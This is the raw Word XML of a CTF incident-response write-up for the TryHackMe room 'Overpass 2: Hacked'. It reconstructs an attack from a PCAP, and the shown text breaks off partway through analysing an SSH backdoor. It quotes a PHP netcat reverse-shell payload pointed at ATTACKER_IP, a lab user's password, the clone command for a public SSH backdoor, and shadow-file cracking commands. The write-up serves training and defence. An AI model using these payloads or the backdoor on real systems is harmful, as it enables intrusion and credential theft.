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4E79"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">OVERPASS 2: HACKED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">TryHackMe Room — Full Technical Write-Up &amp; Incident Response Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="500"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PCAP Forensics  •  Reverse Engineering  •  Credential Cracking  •  Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E0A800" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF3CD" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="150" w:right="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="664D03"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Educational / ethical use only. This report documents activity performed inside an authorized, isolated TryHackMe lab environment (CTF). None of the techniques described here should be used against systems you do not own or do not have explicit written permission to test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Scenario Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Overpass 2: Hacked is the forensics/incident-response follow-up to the original Overpass room. The premise: the fictional "Overpass" company was compromised. A SOC analyst named paradox was on a late shift, noticed suspicious activity, and captured the attack traffic to a PCAP file. The room hands you that PCAP and asks you to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconstruct the attacker's actions purely from the network capture (forensics).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify and reverse-engineer the persistence tool the attacker deployed (research).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use everything learned to log back into the now-live production server, retrieve the flags, and understand how the attacker regained root (attack).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This mirrors a real SOC / DFIR (Digital Forensics &amp; Incident Response) workflow: a defender is handed evidence after the fact and must reconstruct the full attack chain before remediating and "hacking back" only within the authorized scope of the exercise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Tools Used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pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Purpose</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Wireshark / tshark</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Inspect the PCAP, follow TCP streams, search packet bytes</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editcap</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Convert .pcapng → .pcap (some tools, e.g. Scapy, prefer classic pcap)</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John the Ripper</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Crack /etc/shadow style hashes using a wordlist</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hashcat</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GPU-accelerated cracking of salted SHA-512 hash (mode 1710)</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fasttrack.txt / rockyou.txt</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Password wordlists used for dictionary attacks</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nmap</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Re-enumerate the redeployed target to confirm open ports</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ssh</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Log back in through the attacker's own backdoor</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Go (source review)</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Read the backdoor's main.go to understand its auth logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Part 1 — Forensics: Analyzing the PCAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Preparing the capture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The provided file is a .pcapng (pcap-next-generation). Because some tooling (Scapy in particular) does not parse pcapng cleanly, it is good practice to normalize it to classic .pcap first:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">editcap overpass2.pcapng overpass2.pcap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The capture is then opened in Wireshark for manual triage. Filtering on http first gives a quick timeline of the web-based attack phase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Finding the entry point (initial access)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The very first HTTP request in the capture is a GET to /development/ — an apparently forgotten or unlinked development page. Following that TCP stream shows the attacker was redirected into an upload page (/upload). This is the classic pattern of an attacker discovering a hidden or unauthenticated admin/dev endpoint through directory guessing or leaked references, then abusing an insecure file-upload feature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /development/ HTTP/1.1
HTTP/1.1 302 Found
Location: /upload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E0A800" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF3CD" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="150" w:right="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="664D03"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker mindset: unauthenticated file-upload endpoints are high-value because they frequently allow uploading server-side executable code (here, PHP) with no content-type or extension validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 The reverse-shell payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Following the stream further shows a POST to /upload containing a file named payload.php. Its content is a PHP one-liner that calls exec() to spawn a classic Netcat reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc ATTACKER_IP 4242 &gt;/tmp/f")?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How this works technically:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">rm /tmp/f — removes any stale named pipe from a previous attempt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">mkfifo /tmp/f — creates a named pipe (FIFO) used to shuttle data between the shell and netcat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh -i 2&gt;&amp;1 — starts an interactive shell, redirecting stderr into stdout so error output is visible too.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">nc ATTACKER_IP 4242 — netcat connects out to the attacker's listener on port 4242 (an outbound connection, which usually bypasses inbound firewall rules).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The pipe wiring (cat /tmp/f | sh -i 2&gt;&amp;1 | nc ... &gt;/tmp/f) ties the shell's stdin/stdout/stderr to the network socket, giving the attacker a fully interactive remote shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker then simply requests the uploaded file (GET /uploads/payload.php) to trigger execution on the server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Answers derived from this stage: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pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Answer</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Upload page URL</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/development/  (redirects to the /upload form)</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Reverse-shell payload</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&lt;?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc &lt;IP&gt; 4242 &gt;/tmp/f")?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 Post-exploitation: clear-text command and control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Because this is a raw Netcat bind/reverse shell with no TLS, every subsequent command the attacker types — and every byte of output — is visible in plain text inside the TCP stream. Following that stream chronologically shows the attacker:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Running id and whoami to confirm their foothold user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading the shell to a fuller TTY (commonly python -c 'import pty;pty.spawn("/bin/bash")').</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browsing to the Overpass project directory and reading configuration/credential files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Discovering a password for the local user james, then switching user (su james) with it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Password used to privilege-escalate to james:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">whenevernoteartinstant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 Establishing persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With a shell as james, the attacker downloads a third-party tool from GitHub — a real, publicly available Go project called ssh-backdoor — clones it, builds it, generates an RSA keypair (id_rsa), and starts it as a standalone SSH-like listener on the box. This gives the attacker a durable, credential-based way back in that survives a simple password reset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone https://github.com/NinjaJc01/ssh-backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistence mechanism identified:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://github.com/NinjaJc01/ssh-backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E0A800" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF3CD" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="150" w:right="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="664D03"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Defender takeaway: persistence doesn't always mean a rootkit or scheduled task. A statically compiled Go binary that speaks SSH on an arbitrary port is trivial to build, easy to hide, and blends into normal SSH traffic unless the port and process are actively monitored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6 Credential exfiltration and offline cracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Later in the same shell, the attacker reads out the contents of /etc/shadow (again visible in clear text because the channel itself is unencrypted). As the defender reconstructing this after the fact, you can copy those hashed credential lines out of the TCP stream and save them to a local file, e.g. shadow.txt, then attack them offline with John the Ripper using the room's suggested fasttrack wordlist:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">john --wordlist=/opt/fasttrack.txt shadow.txt
john --show shadow.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Result: 4 of the system account passwords were crackable with that wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E0A800" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF3CD" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="150" w:right="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="664D03"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker vs defender lens: the attacker exfiltrated the shadow file for offline, unrate-limited cracking — a standard move once local file read access is obtained, since online/interactive brute force is slow and noisy by comparison.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Part 2 — Research: Reverse-Engineering the Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Since the persistence tool is open source, the safest and most thorough way to understand exactly how it authenticates is to pull down the same repository and read main.go directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone https://github.com/NinjaJc01/ssh-backdoor
cd ssh-backdoor &amp;&amp; cat main.go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 How the backdoor authenticates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reading through the source reveals the program's structure:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It listens on a configurable local port (defaults observed as 2222) and binds to all interfaces (0.0.0.0).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
